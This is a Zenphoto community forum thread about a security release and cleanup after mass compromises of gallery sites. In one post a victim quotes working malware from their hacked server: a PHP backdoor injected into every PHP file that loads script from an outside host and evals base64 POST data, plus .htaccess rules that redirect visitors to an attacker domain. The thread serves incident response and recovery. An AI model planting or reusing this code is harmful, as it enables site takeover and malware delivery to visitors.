More info on:
http://www.zenphoto.org/news/zenphoto-1.4.1.6
Don't forget to read the Forum rules and usage resources
zenphoto forums » General Zenphoto Discussion
Zenphoto 1.4.1.6 security update released
(31 posts)-
acrylian
Developer
Joined: Jul '07
Posts: 13,341Posted 1 year ago # -
Thanks to act as !
It's very good thing...Posted 1 year ago # -
Is there any difference to the manual changes I made yesterday for 1.4.1.5? (I use SVN to manage my install and I'm loath to download and change if I already took care of it by manually removing it).
Posted 1 year ago # -
acrylian
Developer
Joined: Jul '07
Posts: 13,341No, the 1.4.1.6 release (as noted on the post) just incorporates the changes mentioned on the 2nd security post. Otherwise it is just 1.4.1.5. Btw, that is mentioned in the release post's first sentence..;-)
Again, note that the svn trunk is NOT 1.4.1.6 but already 1.4.2 beta (the dev svn stream as well) as the 1.4.1.x line was actually considered complete. This has been announced a week or so ago.
Don't forget to read the Forum rules and usage resourcesPosted 1 year ago # -
Michel Gagnon
Translator
Joined: Apr '10
Posts: 147A slightly different question: I have downloaded and installed the 1.4.3 DEV (8385) version and done the corrections you suggested in the "Security alert - Part 2 update 2". Am I OK?
P.S. One site was hacked, the other was not, but I cleaned and updated both anyways.
Posted 1 year ago # -
acrylian
Developer
Joined: Jul '07
Posts: 13,341Yes, as far as we know. But I recommend to use the TRUNK svn as that wil become the next version 1.4.2. That is beta and will not get new features until the scheduled release (see roadmap on the bugtracker. Using this will help us find bugs we missed.
The DEV svn is for 1.4.3 somewhere in the future. Currently both are still the same but soon this one might get experimental. So we can't recommend to use this on a live site currently.
Don't forget to read the Forum rules and usage resourcesPosted 1 year ago # -
mironb
Translator
Joined: Jan '08
Posts: 73Hi
Mi site was also hacked. I think no is clear but I didn't deleted jpg files with photos. How can I check are they not infected ?Posted 1 year ago # -
acrylian
Developer
Joined: Jul '07
Posts: 13,341I would say try a virus scan for the start.
Don't forget to read the Forum rules and usage resourcesPosted 1 year ago # -
After being affected by this loophole and clearing out the old install when I come to upload (cPanel) the install package my hosts system is rejecting the 1.4.1.6.zip saying it contains a virus (scanner is probably ClamAV).
I can not get any details as to which file it objects to.
Has this been an issue for anyone else?
Posted 1 year ago # -
Maybe we are missing something here. Without the "ajax file manager" we cannot use the "Files" tab under "Upload".
Which seems to mean the only way to add photos is via the web page upload.
Is there some other way to get Zenphoto to process files we already have copied to the server? That has always been our preferred method to load pictures.
Any help is appreciated.
Posted 1 year ago # -
sbillard
Chief Developer
Joined: May '07
Posts: 9,766The "Files" tab did never provide a way to add photos to your gallery. it is just a way to upload files to your "uploaded" folder which you can then place as you wish on your pages through HTML.
It is the "Images" tab that provided the means for uploading photos. It is still present and operational.
Besides, there is always FTP to upload to your site. Zenphoto always processes images it finds in your albums folders.
Don't forget to read the Forum rules and usage resourcesPosted 1 year ago # -
SBillard, thanks for clearing that up for us. We are moving from another photo gallery to Zenphoto and just getting use to the file structure of Zenphoto.
Thanks so much for your quick response. It is really appreciated.
Posted 1 year ago # -
sbillard
Chief Developer
Joined: May '07
Posts: 9,766We are also working closely with the developer of ajaxfilemanager and hope to have a solution to the security issues soon.
Don't forget to read the Forum rules and usage resourcesPosted 1 year ago # -
Hi all,
my site was hacked and i lost a lot of informations :'( But I was able to find some information in the Apache logs.
The hacker succeeded to download the [link removed by moderator] file and execute it. It has mostly to remove all files owned by apache.
I hope this will help someone !Posted 1 year ago # -
fretzl
Moderator
Joined: Sep '08
Posts: 528I removed the link to the zip file because I'm not sure if it's potentially dangerous.
Don't forget to read the Forum rules and usage resourcesPosted 1 year ago # -
Hi,
i'm ok for this. So the zip contain no virus but a php,perl and sql files. The php file is similar to ajaxterm. I think that my issue could help someone.
If you want i post the php file screenshot : http://tinypic.com/r/301ev89/5Posted 1 year ago # -
My site (fotofill.net) was hacked too. We rescanned the site, had the host do the same. I traced the IP and blocked any IP from Russia-Ukraine.It appears the hacker used tiny_mce to get access. I am pretty new to all this. Here is the message from my host:
After further investigation, it appears that a hacker was able to inject malicious code into most (if not all) your php files by using the tiny_mce editor function from your Zenphoto installation.
They suggested this:
1). Update all scripts and plugins to remove vulnerabilities inherent in older versions.2). Scan the local system used to access this account for malware using the following software: MalwareBytes ( http://www.malwarebytes.org/ ) and ComboFix ( http://www.bleepingcomputer.com/combofix/how-to-use-combofix ). Many instances of compromised login details are due to local malware intercepting login details.
We did that. We asked Google to scan the site also. Still waiting...
My problem now is that my logins and passwords were wiped out at ZP and I cannot get in.Anything wth fotofill.net in it is being blocked ny browsers. Can someone help me get to my zp-core? Thanks
Posted 1 year ago # -
sbillard
Chief Developer
Joined: May '07
Posts: 9,766If the whole fotofill.net is blocked it is probably by your hosting company. That is a pretty standard response to this kind of attack. For instance my hoster did this. I had to use FTP to cleanse the site and then contact the hoster to have it unblocked.
There is another thread with details on how to cleanse your site, but basically it involves removing all the site files and reloading from backup. Always, of course, do not restore the zenphoto files but obtain the fixed version and install that.
Don't forget to read the Forum rules and usage resourcesPosted 1 year ago # -
acrylian
Developer
Joined: Jul '07
Posts: 13,341THe blocking of the site is not by the hosting company. It is blocked in the browser by using a warning database Google & Co provide that most browser vendors use.
Sorry, you will have to wait until your site is rescanned and removed from that. On Google that might take a few days. You can of course ignore that warning and proceed. How to reset Zenphoto passwords is explained on our troubleshooting.
Don't forget to read the Forum rules and usage resourcesPosted 1 year ago # -
Hello! I have 2 zenphoto galleries on my site and both of them got hit by the ajax bug so now I am trying to fix it (really annoying because I am in the middle of two large class projects). Based on what I have read on this post and the other couple related posts, this is what I have gathered the solution to fix it is:
1. Delete ajax upload manager folder inside of zenphoto
2. Install latest zenphoto release
3. Go through all php and .htaccess files on the website to ensure they are cleanDoes that sound right? I am still new to zenphoto/website management in general and I want to be sure I don't do something stupid while trying to clean it up and lose the 7000+ images between my two galleries, lol.
Thank you for your help!
Posted 1 year ago # -
acrylian
Developer
Joined: Jul '07
Posts: 13,341That is what we know so far by reports of users (as we ourselves were not hacked).
Don't forget to read the Forum rules and usage resourcesPosted 1 year ago # -
Ok great. I will give that a shot then!
I am enjoying Zenphoto thus far and thank you for your hard work on this. I am now following the RSS feed so I can get updates/security fixes faster (had I done that before I probably wouldn't be in this boat :P).
Posted 1 year ago # -
I appear to also have been effected by this vulnerability. They had my Zenphoto domain redirecting to http://(hacker's URL).in/jaki/index.php as you can see below and also altered the .htaccess and php files for the other domains in my shared hosting the accounts. The latter changes seem to have had no noticeable effect (the rest of the sites run on Drupal 6 or 7).
Can anyone else who was hacked let me know if the hackers altered anything else on their systems that I should fix? I purged everything but the albums folder from my Zenphoto install and removed the added code from the *.php and .htaccess files on my other domains. Is there anything else I should do to set things right?
For reference, the hackers added this to the top of all PHP files:
global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }…and this to the end of all the .htaccess files:
ErrorDocument 400 http://(hacker's URL).in/jaki/index.php ErrorDocument 401 http://(hacker's URL).in/jaki/index.php ErrorDocument 403 http://(hacker's URL).in/jaki/index.php ErrorDocument 404 http://(hacker's URL).in/jaki/index.php ErrorDocument 500 http://(hacker's URL).in/jaki/index.php <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr)\.(.*) RewriteRule ^(.*)$ http://(hacker's URL).in/jaki/index.php [R=301,L] </IfModule>Thanks!
Posted 1 year ago # -
acrylian
Developer
Joined: Jul '07
Posts: 13,341Here are several insights to the hackes by a user:
http://www.zenphoto.org/support/topic.php?id=9951#post-58366Don't forget to read the Forum rules and usage resourcesPosted 1 year ago # -
I have had is more than 2500 php files infected with the prefixed code
different referring domain
all my wordpress files, piwik, sighPosted 1 year ago # -
Also several of my website that use ZP were hacked, I have recovered 1 website, but I'm having troubles with another one, I have deleted all webfiles and when I visit the url, I keep being redirected, although the site is completely empty, also all htaccess were deleted. So my question is, what part keeps redirecting ??
Posted 1 year ago # -
acrylian
Developer
Joined: Jul '07
Posts: 13,341Please take a look to the forum topic linked above. I personally can't answer as we were not affected.
Don't forget to read the Forum rules and usage resourcesPosted 1 year ago # -
puregraphx : I just finished recovery from one of my zengallery installs. If you're still experiencing a redirection, chances are there is a shell access only directory above your FTP (this is the case for godaddy and all of their resellers). If you are a godaddy user, you'll need to enable SSH and use port 22 to find the master htaccess file for your shared hosting account (which isn't visible if you're just using FTP on port 21, only SFTP on port 22). I hope this helps.
Posted 1 year ago # -
Can anyone answer if the cache files need to be cleared before or after the upgrade to prevent the same security hole from allowing unauthorized users in? - I've noticed a lot of very long rss cache files (example: rss_ampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampamplang.xml)
Is this normal activity for zengallery?
Posted 1 year ago # -
acrylian
Developer
Joined: Jul '07
Posts: 13,341I would recommend to clear all caches. Does not hurt as they are recreated on request anyway. It is unlikely that images contain hacked code but the cached html or rss files might do (not php but hacked links or js code).
No, such rss files are not normal, unless you have an album with that long name. Album rss feed files look like this:
rss_Screenshots_screenshots_en_US.xml
This is a cached feed of the screenshots subalbum of the Screenshots album (example from our own site). Language version is English which is the default and only one used on our site anyway.Don't forget to read the Forum rules and usage resourcesPosted 1 year ago #
Reply »
You must log in to post.